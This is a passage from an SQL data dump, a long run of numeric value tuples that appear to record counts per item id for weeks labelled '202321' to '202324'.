1,'202321',5),(4706,1,'202321',5),(4712,1,'202321',5),(4759,1,'202321',5),(4870,1,'202321',5),(4980,1,'202321',5),(5020,1,'202321',5),(5028,1,'202321',5),(5042,1,'202321',5),(5054,1,'202321',5),(5058,1,'202321',5),(5101,1,'202321',5),(5276,1,'202321',5),(5292,1,'202321',5),(5295,1,'202321',5),(5320,1,'202321',5),(5326,1,'202321',5),(481,1,'202321',6),(1604,1,'202321',6),(1722,1,'202321',6),(1724,1,'202321',6),(1772,1,'202321',6),(2165,1,'202321',6),(3038,1,'202321',6),(3245,1,'202321',6),(3261,1,'202321',6),(3275,1,'202321',6),(3297,1,'202321',6),(3307,1,'202321',6),(4368,1,'202321',6),(4444,1,'202321',6),(4524,1,'202321',6),(4681,1,'202321',6),(4694,1,'202321',6),(4697,1,'202321',6),(4753,1,'202321',6),(5046,1,'202321',6),(5071,1,'202321',6),(5131,1,'202321',6),(5248,1,'202321',6),(5298,1,'202321',6),(5310,1,'202321',6),(5314,1,'202321',6),(1745,1,'202321',7),(1770,1,'202321',7),(1774,1,'202321',7),(2154,1,'202321',7),(2309,1,'202321',7),(2658,1,'202321',7),(2769,1,'202321',7),(3005,1,'202321',7),(3034,1,'202321',7),(3060,1,'202321',7),(3072,1,'202321',7),(3107,1,'202321',7),(3229,1,'202321',7),(3240,1,'202321',7),(3738,1,'202321',7),(4301,1,'202321',7),(4329,1,'202321',7),(4357,1,'202321',7),(4404,1,'202321',7),(4416,1,'202321',7),(4566,1,'202321',7),(4612,1,'202321',7),(4776,1,'202321',7),(4878,1,'202321',7),(4976,1,'202321',7),(5024,1,'202321',7),(5080,1,'202321',7),(5128,1,'202321',7),(5134,1,'202321',7),(5323,1,'202321',7),(570,1,'202321',8),(1592,1,'202321',8),(1606,1,'202321',8),(3102,1,'202321',8),(4338,1,'202321',8),(4391,1,'202321',8),(4645,1,'202321',8),(5157,1,'202321',8),(5253,1,'202321',8),(467,1,'202321',9),(474,1,'202321',9),(1711,1,'202321',9),(2159,1,'202321',9),(2804,1,'202321',9),(3752,1,'202321',9),(4238,1,'202321',9),(4420,1,'202321',9),(4520,1,'202321',9),(4551,1,'202321',9),(4608,1,'202321',9),(5067,1,'202321',9),(5076,1,'202321',9),(5122,1,'202321',9),(5140,1,'202321',9),(5317,1,'202321',9),(468,1,'202321',10),(473,1,'202321',10),(1766,1,'202321',10),(3069,1,'202321',10),(4663,1,'202321',10),(5062,1,'202321',10),(5301,1,'202321',10),(487,1,'202321',11),(1584,1,'202321',11),(1614,1,'202321',11),(1718,1,'202321',11),(2609,1,'202321',11),(3066,1,'202321',11),(4674,1,'202321',11),(5304,1,'202321',11),(1608,1,'202321',12),(1612,1,'202321',12),(5033,1,'202321',12),(5264,1,'202321',12),(74,1,'202321',13),(87,1,'202321',13),(108,1,'202321',13),(470,1,'202321',13),(472,1,'202321',13),(2809,1,'202321',13),(4448,1,'202321',13),(4700,1,'202321',13),(4709,1,'202321',13),(5256,1,'202321',13),(5334,1,'202321',13),(335,1,'202321',14),(1598,1,'202321',14),(1728,1,'202321',14),(2457,1,'202321',14),(2503,1,'202321',14),(3030,1,'202321',14),(4457,1,'202321',14),(4677,1,'202321',14),(84,1,'202321',15),(1610,1,'202321',15),(3083,1,'202321',15),(1594,1,'202321',16),(1600,1,'202321',16),(3764,1,'202321',16),(4412,1,'202321',16),(5163,1,'202321',16),(1544,1,'202321',17),(3290,1,'202321',17),(5307,1,'202321',17),(91,1,'202321',18),(1586,1,'202321',18),(1602,1,'202321',18),(76,1,'202321',19),(1596,1,'202321',19),(3781,1,'202321',21),(4930,1,'202321',21),(1582,1,'202321',22),(68,1,'202321',23),(1588,1,'202321',25),(89,1,'202321',27),(5353,1,'202321',27),(5356,1,'202321',28),(5359,1,'202321',33),(72,1,'202321',45),(80,1,'202321',129),(2904,1,'202321',228),(9,1,'202321',741),(110,1,'202322',1),(1730,1,'202322',1),(2063,1,'202322',1),(3249,1,'202322',1),(3265,1,'202322',1),(3752,1,'202322',1),(4432,1,'202322',1),(4694,1,'202322',1),(4744,1,'202322',1),(4878,1,'202322',1),(4883,1,'202322',1),(106,1,'202322',2),(481,1,'202322',2),(483,1,'202322',2),(488,1,'202322',2),(1697,1,'202322',2),(1701,1,'202322',2),(1726,1,'202322',2),(1737,1,'202322',2),(1741,1,'202322',2),(1770,1,'202322',2),(2154,1,'202322',2),(2248,1,'202322',2),(2252,1,'202322',2),(2751,1,'202322',2),(3092,1,'202322',2),(3096,1,'202322',2),(3226,1,'202322',2),(3251,1,'202322',2),(3261,1,'202322',2),(3267,1,'202322',2),(3271,1,'202322',2),(3275,1,'202322',2),(3287,1,'202322',2),(3541,1,'202322',2),(3731,1,'202322',2),(3742,1,'202322',2),(4332,1,'202322',2),(4368,1,'202322',2),(4440,1,'202322',2),(4587,1,'202322',2),(4591,1,'202322',2),(4648,1,'202322',2),(4651,1,'202322',2),(4657,1,'202322',2),(4681,1,'202322',2),(4688,1,'202322',2),(4697,1,'202322',2),(4741,1,'202322',2),(4750,1,'202322',2),(4776,1,'202322',2),(4862,1,'202322',2),(4888,1,'202322',2),(5020,1,'202322',2),(5024,1,'202322',2),(5140,1,'202322',2),(5248,1,'202322',2),(5326,1,'202322',2),(5330,1,'202322',2),(471,1,'202322',3),(482,1,'202322',3),(485,1,'202322',3),(1695,1,'202322',3),(1703,1,'202322',3),(1705,1,'202322',3),(1707,1,'202322',3),(1709,1,'202322',3),(1715,1,'202322',3),(1720,1,'202322',3),(1739,1,'202322',3),(1747,1,'202322',3),(1776,1,'202322',3),(1778,1,'202322',3),(1780,1,'202322',3),(2152,1,'202322',3),(2293,1,'202322',3),(2296,1,'202322',3),(2813,1,'202322',3),(3041,1,'202322',3),(3063,1,'202322',3),(3104,1,'202322',3),(3109,1,'202322',3),(3243,1,'202322',3),(3285,1,'202322',3),(3307,1,'202322',3),(3489,1,'202322',3),(3749,1,'202322',3),(4329,1,'202322',3),(4335,1,'202322',3),(4373,1,'202322',3),(4377,1,'202322',3),(4382,1,'202322',3),(4387,1,'202322',3),(4396,1,'202322',3),(4404,1,'202322',3),(4408,1,'202322',3),(4424,1,'202322',3),(4582,1,'202322',3),(4654,1,'202322',3),(4691,1,'202322',3),(4712,1,'202322',3),(4756,1,'202322',3),(4759,1,'202322',3),(4792,1,'202322',3),(4802,1,'202322',3),(4870,1,'202322',3),(4874,1,'202322',3),(4893,1,'202322',3),(5028,1,'202322',3),(5046,1,'202322',3),(5050,1,'202322',3),(5058,1,'202322',3),(5080,1,'202322',3),(5253,1,'202322',3),(5271,1,'202322',3),(5298,1,'202322',3),(476,1,'202322',4),(1590,1,'202322',4),(1713,1,'202322',4),(1732,1,'202322',4),(1734,1,'202322',4),(1743,1,'202322',4),(1749,1,'202322',4),(1751,1,'202322',4),(1768,1,'202322',4),(1772,1,'202322',4),(1774,1,'202322',4),(1782,1,'202322',4),(2156,1,'202322',4),(2178,1,'202322',4),(2911,1,'202322',4),(2993,1,'202322',4),(3072,1,'202322',4),(3079,1,'202322',4),(3087,1,'202322',4),(3102,1,'202322',4),(3117,1,'202322',4),(3127,1,'202322',4),(3229,1,'202322',4),(3240,1,'202322',4),(3247,1,'202322',4),(3253,1,'202322',4),(3257,1,'202322',4),(3259,1,'202322',4),(3263,1,'202322',4),(3269,1,'202322',4),(3278,1,'202322',4),(3280,1,'202322',4),(3282,1,'202322',4),(3297,1,'202322',4),(3316,1,'202322',4),(3531,1,'202322',4),(3534,1,'202322',4),(3735,1,'202322',4),(4338,1,'202322',4),(4357,1,'202322',4),(4363,1,'202322',4),(4436,1,'202322',4),(4444,1,'202322',4),(4517,1,'202322',4),(4546,1,'202322',4),(4556,1,'202322',4),(4660,1,'202322',4),(4663,1,'202322',4),(4668,1,'202322',4),(4700,1,'202322',4),(4747,1,'202322',4),(4768,1,'202322',4),(4797,1,'202322',4),(4858,1,'202322',4),(4866,1,'202322',4),(4897,1,'202322',4),(4988,1,'202322',4),(5037,1,'202322',4),(5042,1,'202322',4),(5067,1,'202322',4),(5101,1,'202322',4),(5146,1,'202322',4),(5153,1,'202322',4),(484,1,'202322',5),(1699,1,'202322',5),(1724,1,'202322',5),(1745,1,'202322',5),(2150,1,'202322',5),(2165,1,'202322',5),(2558,1,'202322',5),(2704,1,'202322',5),(2801,1,'202322',5),(2965,1,'202322',5),(2991,1,'202322',5),(3005,1,'202322',5),(3006,1,'202322',5),(3023,1,'202322',5),(3027,1,'202322',5),(3034,1,'202322',5),(3097,1,'202322',5),(3273,1,'202322',5),(3479,1,'202322',5),(3498,1,'202322',5),(3724,1,'202322',5),(3727,1,'202322',5),(3771,1,'202322',5),(4275,1,'202322',5),(4323,1,'202322',5),(4326,1,'202322',5),(4412,1,'202322',5),(4428,1,'202322',5),(4454,1,'202322',5),(4612,1,'202322',5),(4685,1,'202322',5),(4709,1,'202322',5),(4771,1,'202322',5),(4996,1,'202322',5),(5054,1,'202322',5),(5076,1,'202322',5),(5157,1,'202322',5),(5259,1,'202322',5),(5289,1,'202322',5),(5310,1,'202322',5),(477,1,'202322',6),(478,1,'202322',6),(479,1,'202322',6),(1718,1,'202322',6),(2161,1,'202322',6),(2297,1,'202322',6),(2617,1,'202322',6),(2748,1,'202322',6),(2775,1,'202322',6),(3124,1,'202322',6),(3245,1,'202322',6),(3313,1,'202322',6),(3430,1,'202322',6),(3438,1,'202322',6),(3482,1,'202322',6),(3721,1,'202322',6),(3746,1,'202322',6),(4341,1,'202322',6),(4514,1,'202322',6),(4529,1,'202322',6),(4762,1,'202322',6),(4983,1,'202322',6),(5122,1,'202322',6),(5125,1,'202322',6),(5137,1,'202322',6),(5256,1,'202322',6),(467,1,'202322',7),(480,1,'202322',7),(486,1,'202322',7),(570,1,'202322',7),(1614,1,'202322',7),(1711,1,'202322',7),(2804,1,'202322',7),(2956,1,'202322',7),(2989,1,'202322',7),(3090,1,'202322',7),(3107,1,'202322',7),(3486,1,'202322',7),(3710,1,'202322',7),(3738,1,'202322',7),(4400,1,'202322',7),(4524,1,'202322',7),(4674,1,'202322',7),(4703,1,'202322',7),(4706,1,'202322',7),(4977,1,'202322',7),(5033,1,'202322',7),(5062,1,'202322',7),(5128,1,'202322',7),(5134,1,'202322',7),(5292,1,'202322',7),(5295,1,'202322',7),(5304,1,'202322',7),(5317,1,'202322',7),(2148,1,'202322',8),(2457,1,'202322',8),(2658,1,'202322',8),(3004,1,'202322',8),(3060,1,'202322',8),(3069,1,'202322',8),(3290,1,'202322',8),(4301,1,'202322',8),(4416,1,'202322',8),(4645,1,'202322',8),(5268,1,'202322',8),(5276,1,'202322',8),(5323,1,'202322',8),(469,1,'202322',9),(1592,1,'202322',9),(1766,1,'202322',9),(2159,1,'202322',9),(2609,1,'202322',9),(2964,1,'202322',9),(3045,1,'202322',9),(3714,1,'202322',9),(3774,1,'202322',9),(3777,1,'202322',9),(4420,1,'202322',9),(4566,1,'202322',9),(4677,1,'202322',9),(4722,1,'202322',9),(4765,1,'202322',9),(4980,1,'202322',9),(5264,1,'202322',9),(5307,1,'202322',9),(5320,1,'202322',9),(102,1,'202322',10),(1584,1,'202322',10),(1598,1,'202322',10),(1600,1,'202322',10),(1728,1,'202322',10),(3038,1,'202322',10),(3764,1,'202322',10),(4448,1,'202322',10),(4542,1,'202322',10),(4551,1,'202322',10),(5071,1,'202322',10),(5301,1,'202322',10),(5314,1,'202322',10),(5356,1,'202322',10),(468,1,'202322',11),(472,1,'202322',11),(1608,1,'202322',11),(1722,1,'202322',11),(2769,1,'202322',11),(3066,1,'202322',11),(4976,1,'202322',11),(5131,1,'202322',11),(5353,1,'202322',11),(474,1,'202322',12),(1544,1,'202322',12),(1606,1,'202322',12),(3030,1,'202322',12),(4457,1,'202322',12),(5359,1,'202322',12),(470,1,'202322',13),(1604,1,'202322',13),(2309,1,'202322',13),(3083,1,'202322',13),(4391,1,'202322',13),(4520,1,'202322',13),(4608,1,'202322',13),(5334,1,'202322',13),(335,1,'202322',14),(487,1,'202322',14),(1602,1,'202322',14),(2809,1,'202322',14),(1594,1,'202322',15),(1610,1,'202322',15),(4238,1,'202322',15),(4753,1,'202322',15),(473,1,'202322',17),(2503,1,'202322',17),(5280,1,'202322',17),(3781,1,'202322',18),(84,1,'202322',21),(1588,1,'202322',21),(76,1,'202322',22),(1596,1,'202322',22),(1612,1,'202322',22),(74,1,'202322',23),(87,1,'202322',23),(108,1,'202322',23),(1586,1,'202322',23),(91,1,'202322',24),(5163,1,'202322',25),(1582,1,'202322',27),(4930,1,'202322',27),(89,1,'202322',29),(72,1,'202322',39),(68,1,'202322',40),(2904,1,'202322',107),(80,1,'202322',162),(9,1,'202322',776),(106,1,'202323',1),(3479,1,'202323',1),(4275,1,'202323',1),(4802,1,'202323',1),(471,1,'202323',2),(1699,1,'202323',2),(1715,1,'202323',2),(1724,1,'202323',2),(1726,1,'202323',2),(1739,1,'202323',2),(1780,1,'202323',2),(2252,1,'202323',2),(2804,1,'202323',2),(2956,1,'202323',2),(3027,1,'202323',2),(3096,1,'202323',2),(3247,1,'202323',2),(3316,1,'202323',2),(3771,1,'202323',2),(4400,1,'202323',2),(4514,1,'202323',2),(4566,1,'202323',2),(4668,1,'202323',2),(4722,1,'202323',2),(4741,1,'202323',2),(4753,1,'202323',2),(4883,1,'202323',2),(5020,1,'202323',2),(5101,1,'202323',2),(110,1,'202323',3),(476,1,'202323',3),(477,1,'202323',3),(483,1,'202323',3),(485,1,'202323',3),(1697,1,'202323',3),(1701,1,'202323',3),(1705,1,'202323',3),(1720,1,'202323',3),(1734,1,'202323',3),(1751,1,'202323',3),(1776,1,'202323',3),(2165,1,'202323',3),(2248,1,'202323',3),(2617,1,'202323',3),(2748,1,'202323',3),(2775,1,'202323',3),(2809,1,'202323',3),(2964,1,'202323',3),(2991,1,'202323',3),(3006,1,'202323',3),(3038,1,'202323',3),(3041,1,'202323',3),(3087,1,'202323',3),(3090,1,'202323',3),(3109,1,'202323',3),(3259,1,'202323',3),(3261,1,'202323',3),(3263,1,'202323',3),(3265,1,'202323',3),(3267,1,'202323',3),(3271,1,'202323',3),(3278,1,'202323',3),(3280,1,'202323',3),(3430,1,'202323',3),(3438,1,'202323',3),(3710,1,'202323',3),(3727,1,'202323',3),(3746,1,'202323',3),(4357,1,'202323',3),(4428,1,'202323',3),(4556,1,'202323',3),(4591,1,'202323',3),(4648,1,'202323',3),(4660,1,'202323',3),(4685,1,'202323',3),(4691,1,'202323',3),(4697,1,'202323',3),(4703,1,'202323',3),(4712,1,'202323',3),(4768,1,'202323',3),(4897,1,'202323',3),(4983,1,'202323',3),(4996,1,'202323',3),(5042,1,'202323',3),(5301,1,'202323',3),(478,1,'202323',4),(480,1,'202323',4),(486,1,'202323',4),(1606,1,'202323',4),(1695,1,'202323',4),(1707,1,'202323',4),(1713,1,'202323',4),(1732,1,'202323',4),(1737,1,'202323',4),(1743,1,'202323',4),(1747,1,'202323',4),(1772,1,'202323',4),(1778,1,'202323',4),(1782,1,'202323',4),(2150,1,'202323',4),(2296,1,'202323',4),(2993,1,'202323',4),(3023,1,'202323',4),(3063,1,'202323',4),(3066,1,'202323',4),(3097,1,'202323',4),(3257,1,'202323',4),(3269,1,'202323',4),(3275,1,'202323',4),(3287,1,'202323',4),(3290,1,'202323',4),(3482,1,'202323',4),(3531,1,'202323',4),(3714,1,'202323',4),(3721,1,'202323',4),(3724,1,'202323',4),(3738,1,'202323',4),(3749,1,'202323',4),(3777,1,'202323',4),(4326,1,'202323',4),(4332,1,'202323',4),(4373,1,'202323',4),(4387,1,'202323',4),(4408,1,'202323',4),(4432,1,'202323',4),(4454,1,'202323',4),(4517,1,'202323',4),(4524,1,'202323',4),(4529,1,'202323',4),(4551,1,'202323',4),(4654,1,'202323',4),(4674,1,'202323',4),(4677,1,'202323',4),(4681,1,'202323',4),(4688,1,'202323',4),(4759,1,'202323',4),(4771,1,'202323',4),(4776,1,'202323',4),(4878,1,'202323',4),(4888,1,'202323',4),(5028,1,'202323',4),(5140,1,'202323',4),(5330,1,'202323',4),(102,1,'202323',5),(467,1,'202323',5),(482,1,'202323',5),(1703,1,'202323',5),(1709,1,'202323',5),(1730,1,'202323',5),(1741,1,'202323',5),(1768,1,'202323',5),(1770,1,'202323',5),(2156,1,'202323',5),(2293,1,'202323',5),(2658,1,'202323',5),(2801,1,'202323',5),(2965,1,'202323',5),(2989,1,'202323',5),(3072,1,'202323',5),(3079,1,'202323',5),(3083,1,'202323',5),(3104,1,'202323',5),(3107,1,'202323',5),(3117,1,'202323',5),(3229,1,'202323',5),(3249,1,'202323',5),(3253,1,'202323',5),(3273,1,'202323',5),(3297,1,'202323',5),(3307,1,'202323',5),(3498,1,'202323',5),(3534,1,'202323',5),(4301,1,'202323',5),(4329,1,'202323',5),(4335,1,'202323',5),(4377,1,'202323',5),(4404,1,'202323',5),(4546,1,'202323',5),(4651,1,'202323',5),(4706,1,'202323',5),(4744,1,'202323',5),(4750,1,'202323',5),(4756,1,'202323',5),(4792,1,'202323',5),(4797,1,'202323',5),(4858,1,'202323',5),(4862,1,'202323',5),(4866,1,'202323',5),(4874,1,'202323',5),(4976,1,'202323',5),(4977,1,'202323',5),(5024,1,'202323',5),(5037,1,'202323',5),(5046,1,'202323',5),(5131,1,'202323',5),(5134,1,'202323',5),(5137,1,'202323',5),(5146,1,'202323',5),(5157,1,'202323',5),(5259,1,'202323',5),(5271,1,'202323',5),(5289,1,'202323',5),(5326,1,'202323',5),(468,1,'202323',6),(469,1,'202323',6),(484,1,'202323',6),(1745,1,'202323',6),(1749,1,'202323',6),(2148,1,'202323',6),(2154,1,'202323',6),(2297,1,'202323',6),(2558,1,'202323',6),(2769,1,'202323',6),(2813,1,'202323',6),(3004,1,'202323',6),(3092,1,'202323',6),(3124,1,'202323',6),(3226,1,'202323',6),(3240,1,'202323',6),(3243,1,'202323',6),(3245,1,'202323',6),(3285,1,'202323',6),(3731,1,'202323',6),(3742,1,'202323',6),(4323,1,'202323',6),(4338,1,'202323',6),(4382,1,'202323',6),(4396,1,'202323',6),(4420,1,'202323',6),(4542,1,'202323',6),(4582,1,'202323',6),(4587,1,'202323',6),(4645,1,'202323',6),(4694,1,'202323',6),(4747,1,'202323',6),(4870,1,'202323',6),(5054,1,'202323',6),(5058,1,'202323',6),(5125,1,'202323',6),(5153,1,'202323',6),(5248,1,'202323',6),(5253,1,'202323',6),(5256,1,'202323',6),(5268,1,'202323',6),(5307,1,'202323',6),(488,1,'202323',7),(1590,1,'202323',7),(1718,1,'202323',7),(1774,1,'202323',7),(2161,1,'202323',7),(2704,1,'202323',7),(2751,1,'202323',7),(2911,1,'202323',7),(3005,1,'202323',7),(3034,1,'202323',7),(3102,1,'202323',7),(3251,1,'202323',7),(3313,1,'202323',7),(3486,1,'202323',7),(3489,1,'202323',7),(3541,1,'202323',7),(3735,1,'202323',7),(3752,1,'202323',7),(4238,1,'202323',7),(4341,1,'202323',7),(4440,1,'202323',7),(4444,1,'202323',7),(4657,1,'202323',7),(4663,1,'202323',7),(4762,1,'202323',7),(4893,1,'202323',7),(4988,1,'202323',7),(5050,1,'202323',7),(5067,1,'202323',7),(5128,1,'202323',7),(5276,1,'202323',7),(5292,1,'202323',7),(5295,1,'202323',7),(5317,1,'202323',7),(479,1,'202323',8),(481,1,'202323',8),(570,1,'202323',8),(1604,1,'202323',8),(1722,1,'202323',8),(2063,1,'202323',8),(2152,1,'202323',8),(2159,1,'202323',8),(2178,1,'202323',8),(2609,1,'202323',8),(3030,1,'202323',8),(3069,1,'202323',8),(3282,1,'202323',8),(3774,1,'202323',8),(4363,1,'202323',8),(4368,1,'202323',8),(4424,1,'202323',8),(4520,1,'202323',8),(4700,1,'202323',8),(5033,1,'202323',8),(5122,1,'202323',8),(5280,1,'202323',8),(84,1,'202323',9),(87,1,'202323',9),(470,1,'202323',9),(474,1,'202323',9),(4436,1,'202323',9),(4448,1,'202323',9),(4765,1,'202323',9),(4980,1,'202323',9),(5071,1,'202323',9),(5080,1,'202323',9),(5310,1,'202323',9),(5353,1,'202323',9),(472,1,'202323',10),(1584,1,'202323',10),(1610,1,'202323',10),(1614,1,'202323',10),(1711,1,'202323',10),(3060,1,'202323',10),(3127,1,'202323',10),(4608,1,'202323',10),(4612,1,'202323',10),(5304,1,'202323',10),(5314,1,'202323',10),(5320,1,'202323',10),(5334,1,'202323',10),(5356,1,'202323',10),(108,1,'202323',11),(335,1,'202323',11),(487,1,'202323',11),(1598,1,'202323',11),(1766,1,'202323',11),(2309,1,'202323',11),(3045,1,'202323',11),(5076,1,'202323',11),(5264,1,'202323',11),(5298,1,'202323',11),(74,1,'202323',12),(2503,1,'202323',12),(4416,1,'202323',12),(4709,1,'202323',12),(5323,1,'202323',12),(1592,1,'202323',13),(1728,1,'202323',13),(2457,1,'202323',13),(4391,1,'202323',13),(5062,1,'202323',13),(4457,1,'202323',14),(1612,1,'202323',15),(4412,1,'202323',15),(4930,1,'202323',15),(5359,1,'202323',15),(1596,1,'202323',16),(1600,1,'202323',16),(1608,1,'202323',16),(3764,1,'202323',16),(3781,1,'202323',16),(5163,1,'202323',16),(473,1,'202323',19),(89,1,'202323',20),(1582,1,'202323',20),(1594,1,'202323',20),(1602,1,'202323',20),(72,1,'202323',21),(1544,1,'202323',21),(76,1,'202323',22),(1586,1,'202323',23),(68,1,'202323',24),(91,1,'202323',24),(1588,1,'202323',39),(2904,1,'202323',94),(80,1,'202323',118),(9,1,'202323',739),(481,1,'202324',1),(1732,1,'202324',1),(1741,1,'202324',1),(1749,1,'202324',1),(1772,1,'202324',1),(2297,1,'202324',1),(2775,1,'202324',1),(3249,1,'202324',1),(3489,1,'202324',1),(3731,1,'202324',1),(4329,1,'202324',1),(4363,1,'202324',1),(4612,1,'202324',1),(4878,1,'202324',1),(5054,1,'202324',1),(5058,1,'202324',1),(5128,1,'202324',1),(5137,1,'202324',1),(5140,1,'202324',1),(5153,1,'202324',1),(110,1,'202324',2),(479,1,'202324',2),(482,1,'202324',2),(483,1,'202324',2),(1747,1,'202324',2),(1770,1,'202324',2),(1780,1,'202324',2),(2293,1,'202324',2),(2989,1,'202324',2),(3006,1,'202324',2),(3034,1,'202324',2),(3066,1,'202324',2),(3079,1,'202324',2),(3087,1,'202324',2),(3096,1,'202324',2),(3097,1,'202324',2),(3104,1,'202324',2),(3124,1,'202324',2),(3240,1,'202324',2),(3247,1,'202324',2),(3259,1,'202324',2),(3269,1,'202324',2),(3285,1,'202324',2),(3430,1,'202324',2),(3752,1,'202324',2),(3774,1,'202324',2),(4338,1,'202324',2),(4368,1,'202324',2),(4373,1,'202324',2),(4387,1,'202324',2),(4404,1,'202324',2),(4424,1,'202324',2),(4428,1,'202324',2),(4432,1,'202324',2),(4524,1,'202324',2),(4546,1,'202324',2),(4591,1,'202324',2),(4668,1,'202324',2),(4694,1,'202324',2),(4697,1,'202324',2),(4703,1,'202324',2),(4753,1,'202324',2),(4756,1,'202324',2),(4776,1,'202324',2),(4792,1,'202324',2),(4802,1,'202324',2),(4858,1,'202324',2),(4897,1,'202324',2),(4988,1,'202324',2),(5024,1,'202324',2),(5028,1,'202324',2),(5042,1,'202324',2),(5046,1,'202324',2),(5071,1,'202324',2),(5125,1,'202324',2),(5131,1,'202324',2),(5146,1,'202324',2),(5157,1,'202324',2),(5259,1,'202324',2),(5298,1,'202324',2),(5301,1,'202324',2),(5330,1,'202324',2),(471,1,'202324',3),(478,1,'202324',3),(485,1,'202324',3),(570,1,'202324',3),(1695,1,'202324',3),(1699,1,'202324',3),(1726,1,'202324',3),(1730,1,'202324',3),(1734,1,'202324',3),(1737,1,'202324',3),(1782,1,'202324',3),(2063,1,'202324',3),(2156,1,'202324',3),(2252,1,'202324',3),(2296,1,'202324',3),(2558,1,'202324',3),(2748,1,'202324',3),(2911,1,'202324',3),(3027,1,'202324',3),(3060,1,'202324',3),(3109,1,'202324',3),(3127,1,'202324',3),(3229,1,'202324',3),(3243,1,'202324',3),(3253,1,'202324',3),(3271,1,'202324',3),(3273,1,'202324',3),(3278,1,'202324',3),(3541,1,'202324',3),(3724,1,'202324',3),(3746,1,'202324',3),(3749,1,'202324',3),(4275,1,'202324',3),(4326,1,'202324',3),(4341,1,'202324',3),(4391,1,'202324',3),(4396,1,'202324',3),(4400,1,'202324',3),(4454,1,'202324',3),(4514,1,'202324',3),(4517,1,'202324',3),(4566,1,'202324',3),(4657,1,'202324',3),(4741,1,'202324',3),(4862,1,'202324',3),(4866,1,'202324',3),(4976,1,'202324',3),(5050,1,'202324',3),(5067,1,'202324',3),(5248,1,'202324',3),(5271,1,'202324',3),(5289,1,'202324',3),(5292,1,'202324',3),(5326,1,'202324',3),(477,1,'202324',4),(480,1,'202324',4),(484,1,'202324',4),(1701,1,'202324',4),(1707,1,'202324',4),(1709,1,'202324',4),(1743,1,'202324',4),(1768,1,'202324',4),(1778,1,'202324',4),(2150,1,'202324',4),(2159,1,'202324',4),(2161,1,'202324',4),(2248,1,'202324',4),(2617,1,'202324',4),(2813,1,'202324',4),(2965,1,'202324',4),(2991,1,'202324',4),(2993,1,'202324',4),(3023,1,'202324',4),(3063,1,'202324',4),(3092,1,'202324',4),(3251,1,'202324',4),(3257,1,'202324',4),(3263,1,'202324',4),(3265,1,'202324',4),(3280,1,'202324',4),(3282,1,'202324',4),(3313,1,'202324',4),(3486,1,'202324',4),(3498,1,'202324',4),(3714,1,'202324',4),(3721,1,'202324',4),(3727,1,'202324',4),(3735,1,'202324',4),(4332,1,'202324',4),(4357,1,'202324',4),(4382,1,'202324',4),(4408,1,'202324',4),(4436,1,'202324',4),(4440,1,'202324',4),(4529,1,'202324',4),(4556,1,'202324',4),(4648,1,'202324',4),(4688,1,'202324',4),(4712,1,'202324',4),(4722,1,'202324',4),(4747,1,'202324',4),(4750,1,'202324',4),(4759,1,'202324',4),(4797,1,'202324',4),(4870,1,'202324',4),(4893,1,'202324',4),(4983,1,'202324',4),(5037,1,'202324',4),(5134,1,'202324',4),(5310,1,'202324',4),(472,1,'202324',5),(476,1,'202324',5),(488,1,'202324',5),(1590,1,'202324',5),(1718,1,'202324',5),(2804,1,'202324',5),(3004,1,'202324',5),(3041,1,'202324',5),(3045,1,'202324',5),(3072,1,'202324',5),(3117,1,'202324',5),(3261,1,'202324',5),(3267,1,'202324',5),(3275,1,'202324',5),(3287,1,'202324',5),(3290,1,'202324',5),(3297,1,'202324',5),(3316,1,'202324',5),(3482,1,'202324',5),(3534,1,'202324',5),(3710,1,'202324',5),(3771,1,'202324',5),(4377,1,'202324',5),(4542,1,'202324',5),(4587,1,'202324',5),(4660,1,'202324',5),(4681,1,'202324',5),(4685,1,'202324',5),(4691,1,'202324',5),(4874,1,'202324',5),(4883,1,'202324',5),(4996,1,'202324',5),(5020,1,'202324',5),(5080,1,'202324',5),(5101,1,'202324',5),(5264,1,'202324',5),(5268,1,'202324',5),(5314,1,'202324',5),(102,1,'202324',6),(467,1,'202324',6),(1606,1,'202324',6),(1703,1,'202324',6),(1705,1,'202324',6),(1713,1,'202324',6),(1715,1,'202324',6),(1720,1,'202324',6),(1751,1,'202324',6),(1774,1,'202324',6),(1776,1,'202324',6),(2148,1,'202324',6),(2658,1,'202324',6),(2751,1,'202324',6),(2956,1,'202324',6),(2964,1,'202324',6),(3083,1,'202324',6),(3226,1,'202324',6),(3245,1,'202324',6),(3307,1,'202324',6),(3438,1,'202324',6),(3479,1,'202324',6),(3742,1,'202324',6),(3777,1,'202324',6),(4444,1,'202324',6),(4582,1,'202324',6),(4608,1,'202324',6),(4651,1,'202324',6),(4771,1,'202324',6),(4888,1,'202324',6),(4977,1,'202324',6),(5253,1,'202324',6),(5276,1,'202324',6),(5295,1,'202324',6),(5304,1,'202324',6),(5307,1,'202324',6),(5323,1,'202324',6),(5363,1,'202324',6),(74,1,'202324',7),(1697,1,'202324',7),(1722,1,'202324',7),(1739,1,'202324',7),(2178,1,'202324',7),(2704,1,'202324',7),(3090,1,'202324',7),(3531,1,'202324',7),(3738,1,'202324',7),(4335,1,'202324',7),(4448,1,'202324',7),(4551,1,'202324',7),(4654,1,'202324',7),(4706,1,'202324',7),(4744,1,'202324',7),(4762,1,'202324',7),(4768,1,'202324',7),(4980,1,'202324',7),(5280,1,'202324',7),(469,1,'202324',8),(1724,1,'202324',8),(1745,1,'202324',8),(2165,1,'202324',8),(2801,1,'202324',8),(3038,1,'202324',8),(3107,1,'202324',8),(3764,1,'202324',8),(4645,1,'202324',8),(4663,1,'202324',8),(4674,1,'202324',8),(5033,1,'202324',8),(5076,1,'202324',8),(5317,1,'202324',8),(474,1,'202324',9),(1584,1,'202324',9),(1614,1,'202324',9),(2152,1,'202324',9),(2809,1,'202324',9),(3005,1,'202324',9),(3102,1,'202324',9),(4323,1,'202324',9),(4416,1,'202324',9),(4677,1,'202324',9),(4709,1,'202324',9),(5334,1,'202324',9),(5353,1,'202324',9),(5359,1,'202324',9),(335,1,'202324',10),(486,1,'202324',10),(1608,1,'202324',10),(2154,1,'202324',10),(4520,1,'202324',10),(4700,1,'202324',10),(4765,1,'202324',10),(5122,1,'202324',10),(5356,1,'202324',10),(1604,1,'202324',11),(2457,1,'202324',11),(3030,1,'202324',11),(3069,1,'202324',11),(5320,1,'202324',11),(1594,1,'202324',12),(1610,1,'202324',12),(1711,1,'202324',12),(1728,1,'202324',12),(2609,1,'202324',12),(4238,1,'202324',12),(4301,1,'202324',12),(4930,1,'202324',12),(5256,1,'202324',12),(108,1,'202324',13),(1612,1,'202324',13),(1766,1,'202324',13),(2309,1,'202324',13),(2503,1,'202324',13),(4412,1,'202324',13),(4457,1,'202324',13),(468,1,'202324',14),(470,1,'202324',14),(2769,1,'202324',14),(5062,1,'202324',14),(87,1